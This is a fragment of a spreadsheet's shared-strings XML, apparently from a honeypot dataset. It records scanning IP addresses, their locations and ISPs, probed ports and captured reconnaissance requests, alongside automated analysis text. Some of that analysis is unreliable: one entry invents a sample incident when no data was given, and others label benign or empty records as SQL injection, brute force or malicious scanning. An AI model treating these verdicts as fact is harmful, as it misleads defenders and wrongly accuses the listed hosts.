  </si>
  <si>
    <t>Gimhae (Mugye-dong)</t>
  </si>
  <si>
    <t>1842943</t>
  </si>
  <si>
    <t>35.2001</t>
  </si>
  <si>
    <t>128.815</t>
  </si>
  <si>
    <t>::ffff:dc5f:4028</t>
  </si>
  <si>
    <t>No data provided.</t>
  </si>
  <si>
    <t>0290bd0bc6f4cfe4a0c312ebea1ddcfc</t>
  </si>
  <si>
    <t>165.154.108.3</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>SMA-LAB_HTTPS_HC1&amp;&amp;abuseipdb</t>
  </si>
  <si>
    <t>8443&amp;&amp;NA&amp;&amp;443&amp;&amp;80</t>
  </si>
  <si>
    <t>AE</t>
  </si>
  <si>
    <t>United Arab Emirates</t>
  </si>
  <si>
    <t>DU</t>
  </si>
  <si>
    <t>Dubai</t>
  </si>
  <si>
    <t>West</t>
  </si>
  <si>
    <t>Dubai (Al Barsha First)</t>
  </si>
  <si>
    <t>292223</t>
  </si>
  <si>
    <t>18573 79559</t>
  </si>
  <si>
    <t>25.1212</t>
  </si>
  <si>
    <t>55.2005</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.9,zh-TW;q=0.8,en;q=0.7,*;q=0.5', 'Connection': 'Close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;NA&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.9,zh-TW;q=0.8,en;q=0.7,*;q=0.5', 'Connection': 'Close', 'Host': '5.253.40.123:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Host': '5.253.40.123:443', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Host': '5.253.40.123:443', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.9,zh-TW;q=0.8,en;q=0.7,*;q=0.5', 'Connection': 'Close', 'Host': '109.123.229.33:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:a59a:6c03</t>
  </si>
  <si>
    <t>Possible malicious activity involves an unknown user attempting to access a favicon on the server using Go programming language's HTTP client, potentially for reconnaissance or as part of a larger attack. &amp;&amp; An unknown client is attempting to access a server, likely an intrusion attempt for reconnaissance or exploitation of a known vulnerability, possibly hosted on the server at IP address 5.253.40.123 and port 443. 
The request is requesting a favicon icon which could be an initial probing action by an attacker. &amp;&amp; Malicious scanner is probing a system for open ports and vulnerabilities on IP address 109.123.229.33, using a fake user agent to evade detection. This could be an initial step in a larger attack or reconnaissance mission. The scanner may also attempt other types of attacks if a vulnerability is found. &amp;&amp; This log entry suggests a potential brute-force or reconnaissance attempt, as it involves a GET request to the root directory of the system with a generic User-Agent and Accept headers that may indicate an attempt to identify vulnerabilities or map out system services. The IP address 109.123.229.33 has made this connection, likely originating from a remote location. &amp;&amp; There is no log data provided, so I have nothing to analyze.</t>
  </si>
  <si>
    <t>Web Scan &amp;&amp; Scanning GET</t>
  </si>
  <si>
    <t>87566f9af187fc94d6f753f95a754a04</t>
  </si>
  <si>
    <t>60.251.193.230</t>
  </si>
  <si>
    <t>60-251-193-230.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;9623&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:3cfb:c1e6</t>
  </si>
  <si>
    <t>No activity detected for Telnet service, but this is unusual because it's not explicitly denied or blocked. 
This could indicate that the malicious entity attempted to use the Telnet service but was either unaware of its existence or did not attempt to utilize it. 
The lack of any other information about the interaction suggests a possible reconnaissance or probing activity. &amp;&amp; No log data provided, unable to analyze. 
However, assuming some sample log data is given, here's an example analysis:
A suspicious connection was made from IP address 192.168.1.100, with the user attempting to access a service that is not publicly available.
The request contained malicious parameters that could potentially lead to system compromise or unauthorized access.
Further investigation would be required to determine the full extent of the potential threat.</t>
  </si>
  <si>
    <t>181c141cc2b19ac42af648d0527f3ac5</t>
  </si>
  <si>
    <t>182.70.119.233</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;13337&amp;&amp;NA</t>
  </si>
  <si>
    <t>Bharti Telenet Ltd.</t>
  </si>
  <si>
    <t>::ffff:b646:77e9</t>
  </si>
  <si>
    <t>16a408aa848732d8f39047a23da9819e</t>
  </si>
  <si>
    <t>122.148.199.240</t>
  </si>
  <si>
    <t>NA&amp;&amp;240.199.148.122.sta.wbroadband.net.au</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;5900&amp;&amp;53&amp;&amp;445&amp;&amp;1521&amp;&amp;3389&amp;&amp;50352&amp;&amp;NA</t>
  </si>
  <si>
    <t>VIC</t>
  </si>
  <si>
    <t>Victoria</t>
  </si>
  <si>
    <t>Melbourne</t>
  </si>
  <si>
    <t>2158177</t>
  </si>
  <si>
    <t>3001</t>
  </si>
  <si>
    <t>-37.8136</t>
  </si>
  <si>
    <t>144.963</t>
  </si>
  <si>
    <t>Vocus PTY LTD</t>
  </si>
  <si>
    <t>::ffff:7a94:c7f0</t>
  </si>
  <si>
    <t>954eb921b95e320aa5cb6ce9ec31b789</t>
  </si>
  <si>
    <t>59.183.22.20</t>
  </si>
  <si>
    <t>PB</t>
  </si>
  <si>
    <t>Punjab</t>
  </si>
  <si>
    <t>Ludhiana</t>
  </si>
  <si>
    <t>Samrāla</t>
  </si>
  <si>
    <t>1257503</t>
  </si>
  <si>
    <t>30.836</t>
  </si>
  <si>
    <t>76.1932</t>
  </si>
  <si>
    <t>::ffff:3bb7:1614</t>
  </si>
  <si>
    <t>53916170b2bad9780ded3471e47e6277</t>
  </si>
  <si>
    <t>45.224.133.28</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Bahia</t>
  </si>
  <si>
    <t>Araci Municipality</t>
  </si>
  <si>
    <t>Araci</t>
  </si>
  <si>
    <t>3471854</t>
  </si>
  <si>
    <t>-11.3333</t>
  </si>
  <si>
    <t>-38.9667</t>
  </si>
  <si>
    <t>267659</t>
  </si>
  <si>
    <t>CONEXXUS SERVICO DE INFORMATICA</t>
  </si>
  <si>
    <t>Conexxus Servico De Informatica</t>
  </si>
  <si>
    <t>::ffff:2de0:851c</t>
  </si>
  <si>
    <t>No activity detected for TELNET service, possibly indicating that it is not being used or exploited by attackers. 
TELNET is an older protocol often targeted by malicious actors for password guessing attacks or other forms of exploitation.
This lack of activity could also suggest that the service is not exposed to the public or properly configured.</t>
  </si>
  <si>
    <t>efd88bac330a42bdd123b287992a1e5f</t>
  </si>
  <si>
    <t>205.210.31.17</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_FTP_H21&amp;&amp;SMA-LAB_FTP_H3&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_SNMP_H38&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_SNMP_H40&amp;&amp;SMA-LAB_RDP_H11&amp;&amp;SMA-LAB_SIP_H2&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_SNMP_H28&amp;&amp;SMA-LAB_MYSQL_H7&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_ORACLE_H3&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_MSSQL_H12&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_SIP_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_HTTPS_H3&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_REDIS_H2&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_IMAP_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;161&amp;&amp;3306&amp;&amp;443&amp;&amp;32120&amp;&amp;1433&amp;&amp;389&amp;&amp;110&amp;&amp;5432&amp;&amp;3389&amp;&amp;NA&amp;&amp;1521&amp;&amp;9100&amp;&amp;56607&amp;&amp;23&amp;&amp;6379&amp;&amp;1080&amp;&amp;143&amp;&amp;80&amp;&amp;21&amp;&amp;56116&amp;&amp;55146&amp;&amp;5900&amp;&amp;52540</t>
  </si>
  <si>
    <t>command&amp;&amp;connection&amp;&amp;query&amp;&amp;GET&amp;&amp;NA&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lAdntg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EsZnil'}}&amp;&amp;{Data_VNC:NA}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f11</t>
  </si>
  <si>
    <t>The threat actor is attempting to scan and exploit various services on the network, likely as part of a reconnaissance phase or a brute-force attack. &amp;&amp; The threat actor is scanning and probing various services on the network, likely attempting to identify vulnerabilities or gain unauthorized access. &amp;&amp; The attackers are attempting to gather sensitive information and exploit vulnerabilities in various systems, including servers, databases, and network devices. They are using reconnaissance techniques to identify potential targets, followed by attempts to gain unauthorized access or escalate privileges. &amp;&amp; The attacker is attempting to gather information about the target system's services and configurations, likely for reconnaissance purposes. They are sending various types of requests to different ports and protocols, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and others. &amp;&amp; The attacker is attempting to scan and potentially exploit various services on the targeted network, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and others. The attacker's activities suggest a reconnaissance phase to identify vulnerable services and potentially exploit them for malicious purposes. &amp;&amp; The attacker is scanning and probing various services on a network, attempting to identify vulnerabilities and gain unauthorized access. They are using multiple protocols such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, etc. &amp;&amp; The attacker is attempting to scan for vulnerabilities and gather information about the system, likely as a precursor to further malicious activity such as exploitation or data exfiltration.</t>
  </si>
  <si>
    <t xml:space="preserve">  &amp;&amp;   &amp;&amp;  &amp;&amp;  Port scanning &amp;&amp;  &amp;&amp; **Port Scanning** &amp;&amp; Reconnaissance &amp;&amp; FTP Brute &amp;&amp; TLS Auth &amp;&amp; TLS Attack</t>
  </si>
  <si>
    <t>9a94639a16388e682d1bab7d3a89939d</t>
  </si>
  <si>
    <t>117.197.228.234</t>
  </si>
  <si>
    <t>::ffff:75c5:e4ea</t>
  </si>
  <si>
    <t>e4d8c79d3169344400dd1fea0bdac9f8</t>
  </si>
  <si>
    <t>103.134.46.213</t>
  </si>
  <si>
    <t>UK</t>
  </si>
  <si>
    <t>Uttarakhand</t>
  </si>
  <si>
    <t>Dehradun</t>
  </si>
  <si>
    <t>Gorakhpur (Defence Colony)</t>
  </si>
  <si>
    <t>10323057</t>
  </si>
  <si>
    <t>248012</t>
  </si>
  <si>
    <t>30.2862</t>
  </si>
  <si>
    <t>78.0544</t>
  </si>
  <si>
    <t>138315</t>
  </si>
  <si>
    <t>Countrylink Communiction Pvt Ltd</t>
  </si>
  <si>
    <t>2019-02-04</t>
  </si>
  <si>
    <t>CLCPL</t>
  </si>
  <si>
    <t>::ffff:6786:2ed5</t>
  </si>
  <si>
    <t>2628739c2637c5894c317b295c254f40</t>
  </si>
  <si>
    <t>190.210.37.134</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>10404&amp;&amp;23</t>
  </si>
  <si>
    <t>-34.6037</t>
  </si>
  <si>
    <t>-58.3816</t>
  </si>
  <si>
    <t>16814</t>
  </si>
  <si>
    <t>NSS S.A.</t>
  </si>
  <si>
    <t>NSS S.A</t>
  </si>
  <si>
    <t>NA&amp;&amp;connection&amp;&amp;login</t>
  </si>
  <si>
    <t>::ffff:bed2:2586</t>
  </si>
  <si>
    <t>edf0589851696acf72118608af974345</t>
  </si>
  <si>
    <t>147.185.132.123</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_IRC_H38&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_SSH_H16&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_ORACLE_H25&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_ORACLE_H6&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_SNMP_H19&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_RDP_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_POP3_H31&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_IMAP_H6&amp;&amp;SMA-LAB_ORACLE_H4&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_NTP_H3&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_IRC_H33&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_RDP_H23&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_PJL_H3&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_SIP_H22&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_SIP_H38&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_NTP_H19&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_RDP_H31&amp;&amp;SMA-LAB_SMB_H15&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_SIP_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;443&amp;&amp;110&amp;&amp;6667&amp;&amp;5432&amp;&amp;23&amp;&amp;22&amp;&amp;21142&amp;&amp;143&amp;&amp;445&amp;&amp;3389&amp;&amp;1521&amp;&amp;161&amp;&amp;1080&amp;&amp;9100&amp;&amp;8443&amp;&amp;6379&amp;&amp;22&amp;&amp;29468&amp;&amp;NA&amp;&amp;3306&amp;&amp;1433&amp;&amp;21&amp;&amp;63808&amp;&amp;54778&amp;&amp;54013&amp;&amp;5900&amp;&amp;49574&amp;&amp;54686&amp;&amp;55325&amp;&amp;80&amp;&amp;56208&amp;&amp;20030&amp;&amp;56577&amp;&amp;50327&amp;&amp;58420&amp;&amp;58438&amp;&amp;58452&amp;&amp;58422</t>
  </si>
  <si>
    <t>request&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET&amp;&amp;query&amp;&amp;command&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jjVaRDzpW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UyZYKe'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vhCZBQ'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VoKQKfEoh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GJNeGG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=kYMqWo'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.123,63282)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.123,63290)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.123,63304)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=QRojeeKgx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jnAkxY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ovmrlB'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XkmZXG'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GnSgqikwY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=joLWrI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BmPYsq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LxRrGGJRc'}}</t>
  </si>
  <si>
    <t>::ffff:93b9:847b</t>
  </si>
  <si>
    <t>Unknown POP3 activity detected, indicating possible scanning or probing attempts to exploit vulnerabilities for email account access. No actual login attempt was made as Data_POP3 is marked as NA. This could be an indication of reconnaissance before a more targeted attack. &amp;&amp; Unknown access to MySQL database, possibly an attempt to exploit or scan for vulnerabilities. 
No specific query was attempted but still indicates potential malicious activity. 
Could be a reconnaissance phase of a larger attack. &amp;&amp; The data suggests that an attacker is trying to access MySQL database services, possibly attempting to exploit vulnerabilities or gain unauthorized access. This could be a sign of SQL injection or brute-force attack attempts. The fact that no action has been taken (indicated by "NA") implies the activity was detected but not acted upon. &amp;&amp; The system detected an attempt to access Oracle database information, suggesting unauthorized probing or reconnaissance activity. This could be a precursor to further malicious activities such as SQL injection attacks. The intent appears to be gathering sensitive database information for potential exploitation.</t>
  </si>
  <si>
    <t>03645d68f2b00751c833fd25b668ae8c</t>
  </si>
  <si>
    <t>45.126.171.175</t>
  </si>
  <si>
    <t>Mumbai (Pawan Baug)</t>
  </si>
  <si>
    <t>19.1771</t>
  </si>
  <si>
    <t>72.848</t>
  </si>
  <si>
    <t>134014</t>
  </si>
  <si>
    <t>NET 4 U SERVICES PVT LTD</t>
  </si>
  <si>
    <t>NET 4 U Services PVT LTD</t>
  </si>
  <si>
    <t>::ffff:2d7e:abaf</t>
  </si>
  <si>
    <t>No TELNET activity detected, but this is an expected result since most modern networks block or disable TELNET by default, making it unlikely for malicious actors to use it. However, the presence of a placeholder suggests that the monitoring system is keeping track of potential vulnerabilities. No indication of actual malicious behavior.</t>
  </si>
  <si>
    <t>Scanning Attack</t>
  </si>
  <si>
    <t>9c0fba86e1624550e5ee7ab1f189e00d</t>
  </si>
  <si>
    <t>154.212.141.213</t>
  </si>
  <si>
